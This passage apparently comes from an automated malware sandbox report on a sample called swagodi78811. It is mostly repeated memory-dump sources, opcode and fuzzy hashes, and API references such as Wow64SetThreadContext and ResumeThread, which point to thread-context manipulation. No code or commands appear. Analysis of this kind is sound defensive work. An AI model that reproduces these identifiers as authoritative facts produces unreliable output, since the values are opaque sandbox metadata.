                                                • Opcode ID: 976a7f34de84f060df036356bd19253589e76f8045cda08e85efba4154e115a9
                                                • Instruction ID: 6d51ca33613183fcda3b9f4e274b8e5cccca89c542c812d02df581e4a28b2dda
                                                • Opcode Fuzzy Hash: 976a7f34de84f060df036356bd19253589e76f8045cda08e85efba4154e115a9
                                                • Instruction Fuzzy Hash: 864197B8D002589FCF10CFA9D984AAEFBB1BB49310F20942AE815BB350D735A955CF65
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0028E377
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: a6082759693472e5d4f42c07a3fe6e9ff568796ea3c37b2ed501f80ff91e1fcd
                                                • Instruction ID: 6418325523aa6e313843849ee9d5d88d9683ed467afd65b964d24238c9ed52cc
                                                • Opcode Fuzzy Hash: a6082759693472e5d4f42c07a3fe6e9ff568796ea3c37b2ed501f80ff91e1fcd
                                                • Instruction Fuzzy Hash: 5341BCB4D112589FCF10DFAAD884AEEBFB1AF49314F24846AE418B7250C7789A49CF54
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0028E377
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: l0e
                                                • API String ID: 0-1544702066
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h}e
                                                • API String ID: 0-516739558
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ab281f155cd248d69539e4c2d3a33752dccee49103566bf13097fd8b29ebaf0
                                                • Instruction ID: 5a3623dacfa586e81537e0342be39939bae062b3a4542e0aba6bd6931623ce32
                                                • Opcode Fuzzy Hash: 2ab281f155cd248d69539e4c2d3a33752dccee49103566bf13097fd8b29ebaf0
                                                • Instruction Fuzzy Hash: 05F0AE39A04268DFCB20CF94CD84BE9BBB5FB4D308F1481D9A508A7251C331AE82DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 49850b6f0ea37dd783cbfc363a7bb2ee0bfef36aff042b6ecf9bcb9295c9cc62
                                                • Instruction ID: 28ae499eaad679c12096f8c978b223b647e0f2b83622c7663ee6d1a0ff47688e
                                                • Opcode Fuzzy Hash: 49850b6f0ea37dd783cbfc363a7bb2ee0bfef36aff042b6ecf9bcb9295c9cc62
                                                • Instruction Fuzzy Hash: 86D01230A8A118D7C714DBA4EA416BDBBBCAF45305F6451AAC84823242C6741A86E686
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d798ebc5ea2d77dad310200986533bf3e6c86f38261389012a810476dfa8ca70
                                                • Instruction ID: 177fb2b3afd2521ad60220d0043f3b6a18f73267ca96e7c379d8a09e87b187fa
                                                • Opcode Fuzzy Hash: d798ebc5ea2d77dad310200986533bf3e6c86f38261389012a810476dfa8ca70
                                                • Instruction Fuzzy Hash: 4EE01A70B05265DFCB60CF50E8686ECBBB5FF4A302F402096D44EA2220CB744EC1CE02
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d0c748f92129ff16dd7969aa1bea1b36e42c9ba68291d2c182eb36cd4f24578
                                                • Instruction ID: 4361e4ea7e3fc40dcdeba3791eab51faf546993a446e0748fa96ede42ac44223
                                                • Opcode Fuzzy Hash: 4d0c748f92129ff16dd7969aa1bea1b36e42c9ba68291d2c182eb36cd4f24578
                                                • Instruction Fuzzy Hash: F0E0B674A10218DFC740EFA8E58465DBBF4AF48305F2041A9D94897360E7319E84DB81
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07a5edb0424de505e5aa1f6a851fe0579aca128476c41aba5ef3e5d431430d42
                                                • Instruction ID: 78282a234ce210fb24c349a04370f83be3fc25a1d29126b81a1d9ff8dd785e52
                                                • Opcode Fuzzy Hash: 07a5edb0424de505e5aa1f6a851fe0579aca128476c41aba5ef3e5d431430d42
                                                • Instruction Fuzzy Hash: 42D05E70949118EBD704DFA8E8556AEBBB9BB81304F6041AAC80923341C7B41E95DBDA
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8452bfdfcca9094ff545d80253e8c1108a74a9ec2c325fbfd54e182a8400fbe
                                                • Instruction ID: bc817589c8534a97629450f836618cbf3eec0a90a78fbf64dd25e25c84df810f
                                                • Opcode Fuzzy Hash: c8452bfdfcca9094ff545d80253e8c1108a74a9ec2c325fbfd54e182a8400fbe
                                                • Instruction Fuzzy Hash: BCD01730D00208EFCB40EFA8E88539DBBB4AB44200F2041AA9848D3350E7305B80CB81
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c66ba86d11879b052c3b341e1564665b80e904aef907df03f11fe9066f14eeec
                                                • Instruction ID: 21a3ce07054fee2eb6e5b15ee636da61b112ca76187017821a5902e3afd314f7
                                                • Opcode Fuzzy Hash: c66ba86d11879b052c3b341e1564665b80e904aef907df03f11fe9066f14eeec
                                                • Instruction Fuzzy Hash: DDD05E74901108DFC700DFA9DA1835DBBF8EB04350F1009959808C3201D6304A40E780
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 833251d3caea62d060f22fab3ebb80f30e7fb781be46f86ade100734e8f8c27d
                                                • Instruction ID: e79bd6415e889b1cc4bf684fc81d0ef8282851c8e83371f827dc2177e8f621df
                                                • Opcode Fuzzy Hash: 833251d3caea62d060f22fab3ebb80f30e7fb781be46f86ade100734e8f8c27d
                                                • Instruction Fuzzy Hash: 21C01220F6B0248EC700EAA1F1A08FFA2FD5F4A300BA17206982573203CD28D80195CD
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86d3d6f276e84de7a201f1c102926863c263a5e9415074e1c435d7fff39d718a
                                                • Instruction ID: af5f27909ef036bdb14415cd037594e159de39f8f116a71f93d6cf4e6569dbf7
                                                • Opcode Fuzzy Hash: 86d3d6f276e84de7a201f1c102926863c263a5e9415074e1c435d7fff39d718a
                                                • Instruction Fuzzy Hash: D3D0C97490120CEFC750DFA8E91875DBBF8EB49355F2445AAE808D3750E7B15E80DB92
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c47fa9a4e0a3857ec774b113c762bc61586150f37504f3e0ac746efef8f7672e
                                                • Instruction ID: 1d08d4c924a669dc573488131bdbdc68dc01179ff24ed647d0cbc81e430ecece
                                                • Opcode Fuzzy Hash: c47fa9a4e0a3857ec774b113c762bc61586150f37504f3e0ac746efef8f7672e
                                                • Instruction Fuzzy Hash: 27D0223090120CEBC314DFA8E40072EB73CEB41308FA000AED40803310CBB65E80C7D4
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4659ed75daf1fdae5a99e0aae0e992461197f1482ec645c6ad9444db5665e9d6
                                                • Instruction ID: 12956dcb5d354c28cd11ad85d8afb2b719ec5864dca7efbbf7529417e9386cf1
                                                • Opcode Fuzzy Hash: 4659ed75daf1fdae5a99e0aae0e992461197f1482ec645c6ad9444db5665e9d6
                                                • Instruction Fuzzy Hash: 1EC0127051110CEBC714DF9CE811B6EB76CE781254F50019DD40913250DB711E80E7D5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f0af51fa7696f32aa0f2d8d30894edf9ed35e1369239164c75fe7a9866bdacb
                                                • Instruction ID: 266c8cc4e2ef015c57022481689f683b1dafb18bac6e08d82a9c74e370495567
                                                • Opcode Fuzzy Hash: 5f0af51fa7696f32aa0f2d8d30894edf9ed35e1369239164c75fe7a9866bdacb
                                                • Instruction Fuzzy Hash: 69C09B35B45118D7CB00DBC4F8550FCF735DBC7233F102062D10D93051876419558655
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1862bd26a8982a16c636f0a8b5ede2dd50d6cf060aea2dcb89b6a822cb8bd874
                                                • Instruction ID: 69389e73824acd92a5e468575d5ce8f121c3c48c333ab332555f176e032b36cb
                                                • Opcode Fuzzy Hash: 1862bd26a8982a16c636f0a8b5ede2dd50d6cf060aea2dcb89b6a822cb8bd874
                                                • Instruction Fuzzy Hash: 0AC01270F05219CFCB18DBE9E081AFDB7F8DB08300B644016D405A2343C6349801DB44
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46fff5a0db64adcd6d0bf19a576305565e7acb69d483960ad7d99c559630bb69
                                                • Instruction ID: 0897d5b72597e6baec181eb92bf3f958a8792bd40d9c90cd1107c561836086b8
                                                • Opcode Fuzzy Hash: 46fff5a0db64adcd6d0bf19a576305565e7acb69d483960ad7d99c559630bb69
                                                • Instruction Fuzzy Hash: CEA0121451420843D200574091581606A05E78F242F705501900E00836022C58034902
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                • Opcode ID: 74cfe099b4be6060a0b6cbfc7f79f1c2d84021f918c737c4631e53880ee8ea2e
                                                • Instruction ID: 245308ab3734b481f92b9f6832e03a0e1eee39f50ec1b8cc4cce1c92f6538995
                                                • Opcode Fuzzy Hash: 74cfe099b4be6060a0b6cbfc7f79f1c2d84021f918c737c4631e53880ee8ea2e
                                                • Instruction Fuzzy Hash: D6819574E10258CFDB58DFA9D984A9DBBF2FF89300F1480A9E409AB366DB709945CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: 699e05b40082dfd0bc69362362e3e02de81b93bece22db3231d385f50742ef5f
                                                • Instruction ID: e56b3d6314ae5a80b6ba4c3ec17cc85edbf1af5ab4eda9c7b686e307dc6f0b13
                                                • Opcode Fuzzy Hash: 699e05b40082dfd0bc69362362e3e02de81b93bece22db3231d385f50742ef5f
                                                • Instruction Fuzzy Hash: 6981B674E11258CFDB58DFA9D884A9DBBF2BF89300F14C06AE409AB366DB309945CF10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: e299372ca77f3801dc765d5d5da9b35b478e046db91a15e2b441ea9fb7e35b6f
                                                • Instruction ID: c65d9ca70fc6f2b77079fe92cb52d8b053d1dcde5ca1a7baea21512ff2bbf75d
                                                • Opcode Fuzzy Hash: e299372ca77f3801dc765d5d5da9b35b478e046db91a15e2b441ea9fb7e35b6f
                                                • Instruction Fuzzy Hash: 7F81C574E00258DFDB18DFA9D984A9DBBF6BF89300F14C069E409AB366DB309995CF10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: 25ea348f0db4fd46182047ed0ca9aba1e46884104901987a3bb0954be5503c7f
                                                • Instruction ID: 1e958431d54dce4bcf002ccc847816cfb2ecae9bc23dacd984843bf3d0d18e22
                                                • Opcode Fuzzy Hash: 25ea348f0db4fd46182047ed0ca9aba1e46884104901987a3bb0954be5503c7f
                                                • Instruction Fuzzy Hash: E381C574E10258CFDB58DFA9D984A9DBBF2BF89300F14C06AE409AB366DB709945CF10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K
                                                • API String ID: 0-856455061
                                                • Opcode ID: 4aa85c6f6e42c3f9efdc568e2d238d2c911b0927d698787991d5f1aaf365ce3d
                                                • Instruction ID: d38e3ddc88c564ad172f50e1c38188e6428ea9cadf7a91b138aa1b8ccaa9ab7a
                                                • Opcode Fuzzy Hash: 4aa85c6f6e42c3f9efdc568e2d238d2c911b0927d698787991d5f1aaf365ce3d
                                                • Instruction Fuzzy Hash: EFB12475D046198FDB15DF69C8887DDBBB1FF89300F14C2AAD408AB261EB74AA85CF41
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fe091acc9f80c00b79140b1f20a70c9e262b401eeb0a9d45dcc06ffc6159228
                                                • Instruction ID: 8f9140e33ec417d165f37b75ac82995f7a1f51dee77b47f97c56f2d51da74f8e
                                                • Opcode Fuzzy Hash: 2fe091acc9f80c00b79140b1f20a70c9e262b401eeb0a9d45dcc06ffc6159228
                                                • Instruction Fuzzy Hash: 45828F74E012288FDB64DF69DD94BDDBBB2AF89300F5481EA940DA7265DB319E81CF40
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4868d8e4f4b0f3eb5b96b706d2991ef431f3793136d72e2a4e1b82c058e77584
                                                • Instruction ID: 0369f215c1e40a0d2a0ec56c9dbd45e5bc29427dec0b0e1c59d9770b70e11c0f
                                                • Opcode Fuzzy Hash: 4868d8e4f4b0f3eb5b96b706d2991ef431f3793136d72e2a4e1b82c058e77584
                                                • Instruction Fuzzy Hash: 7772D374E14229CFDB64DF69C884BDDBBB2BB89300F5485EAD409A7255DB30AE81CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c3a400e39f004670dae04ed42738dbb6883ebc33826ba599fcca4a0ecc2db599
                                                • Instruction ID: bb40f3ef8cbee740633e7d8437ddfcf1a15ec1ac1e048159ae157896229c4963
                                                • Opcode Fuzzy Hash: c3a400e39f004670dae04ed42738dbb6883ebc33826ba599fcca4a0ecc2db599
                                                • Instruction Fuzzy Hash: B2529D74E01229CFDB64DF69C984B9DBBB2BF89300F5085EAD409A7255DB31AE81CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5006a4c93a8b61003644ffdcd5f3658897a4ad8fed55319025a583a314455f9b
                                                • Instruction ID: fb20e08a31ebbd03dd254e270c57574c26fdd8ac40697b35ac963a20d055206b
                                                • Opcode Fuzzy Hash: 5006a4c93a8b61003644ffdcd5f3658897a4ad8fed55319025a583a314455f9b
                                                • Instruction Fuzzy Hash: 1EF1F774D10228CFDB18DFA8D884B9DFBB2BF84304F5585A9D808AB396DB719985CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663368968.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_670000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d54278c30a517acb1a261fb813c4bba35d1cc8522418fc8c03e957aa11ea8e9f
                                                • Instruction ID: f79b8691438f9c9585181b45a959794c477b1137dd8a61df3bbde041b3db85e2
                                                • Opcode Fuzzy Hash: d54278c30a517acb1a261fb813c4bba35d1cc8522418fc8c03e957aa11ea8e9f
                                                • Instruction Fuzzy Hash: 27D19274E00218CFDB64DFA5C984B9DBBB2BF89300F6085A9D809AB355DB359E85CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663368968.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_670000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6bcba8b804853c2a83e517c26d2c5e1cd6db9abbf41a9ae609e16d4815a299e
                                                • Instruction ID: 88f51e43ca1f190a699771346dddbe222a94ce2bcf59a9a183a24bbaa053daa4
                                                • Opcode Fuzzy Hash: c6bcba8b804853c2a83e517c26d2c5e1cd6db9abbf41a9ae609e16d4815a299e
                                                • Instruction Fuzzy Hash: F4D19174E002188FDB54DFA5C984BADBBB2BF89300F6085A9D809AB355DB359E85CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd95524324e4ea6080b9e732aa3264386cc064cc0e9a55322add0b85459773da
                                                • Instruction ID: 2c97e389497a36daef654fd30748f39be34adaf47082d160cfbfc06e613d7f56
                                                • Opcode Fuzzy Hash: fd95524324e4ea6080b9e732aa3264386cc064cc0e9a55322add0b85459773da
                                                • Instruction Fuzzy Hash: F4D1B274E00218CFDB14DFA5C994BADBBB2BF89300F6481A9D809A7395DB359E85CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663368968.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_670000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01e8344a666a806a710cd2554c2ab31a3284307d4e7c1be72a20bd363734628f
                                                • Instruction ID: 5cbac315e836854cdce3b88a1dfa3b1221f59152a6bf222e74fdd1bfb53ca7dd
                                                • Opcode Fuzzy Hash: 01e8344a666a806a710cd2554c2ab31a3284307d4e7c1be72a20bd363734628f
                                                • Instruction Fuzzy Hash: 5AD1A074E002188FDB54DFA9C980B9DBBB2FF89300F6485A9D809AB355DB359E85CF50
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ee67455a93be136f68551c68c5d701cdf195199c3684b0b422e6da8e76e67f7
                                                • Instruction ID: 5f0bf48624c0a1e2ae8c58a03ac9e64deca1ca74c86be5c434bd489574daa599
                                                • Opcode Fuzzy Hash: 5ee67455a93be136f68551c68c5d701cdf195199c3684b0b422e6da8e76e67f7
                                                • Instruction Fuzzy Hash: F0C1F7B5D01259CFEB68CF69D884BD9BBB2BF89300F14C0EAD448AB255DB314A85CF11
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c05e01eb17e27676e3fcd9cd9d94408a33938819a105314cd4cc7c37ddb8d916
                                                • Instruction ID: 280134997fa2887577929323fe6219f01196cf6681e6070598ff9091c7564876
                                                • Opcode Fuzzy Hash: c05e01eb17e27676e3fcd9cd9d94408a33938819a105314cd4cc7c37ddb8d916
                                                • Instruction Fuzzy Hash: C2A1A674D01219CFEB68DF6AD984B9EFBF2AF89300F14C1A9D448A7291DB705A85CF11
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdfeab9f56342ec77e492546dca96fe44cfd83fa914aa70196fecb02eca02590
                                                • Instruction ID: 6a7faee92b124ff3342e6e0a62a261e0a8161c50f524311dcebda70fb4c002d3
                                                • Opcode Fuzzy Hash: bdfeab9f56342ec77e492546dca96fe44cfd83fa914aa70196fecb02eca02590
                                                • Instruction Fuzzy Hash: 1AA1A474E012298FEB68DF6AD984B9DFBF2AF89300F14C1E9D409A7254DB705A85CF11
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad694fe4c8dbf030fc316e6161ec97058045468eae0cd5e8553053d30d8f3613
                                                • Instruction ID: 2da2cab5bd88c318d76ab3ff3cbbd9eeb6bccfc66fc9eeacea7915e5a88a746b
                                                • Opcode Fuzzy Hash: ad694fe4c8dbf030fc316e6161ec97058045468eae0cd5e8553053d30d8f3613
                                                • Instruction Fuzzy Hash: CBA1B474E012198FEB68DF6AD944B9DFBF2BF89300F14C1AAD409A7254DB705A85CF11
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c643c2c2f672f9f71214c3f99d44b792ddb486edb6d343fc76fe99a2c3fe0e1
                                                • Instruction ID: 0cbb531c9180ae4ce842322e5d955baf24931c65bc60bd98339342cfbf71719b
                                                • Opcode Fuzzy Hash: 1c643c2c2f672f9f71214c3f99d44b792ddb486edb6d343fc76fe99a2c3fe0e1
                                                • Instruction Fuzzy Hash: E1A1B574E01219CFEB68DF6AD984B9DFBF2AF89300F14C0AAD409A7254DB745A85CF11
                                                Memory Dump Source
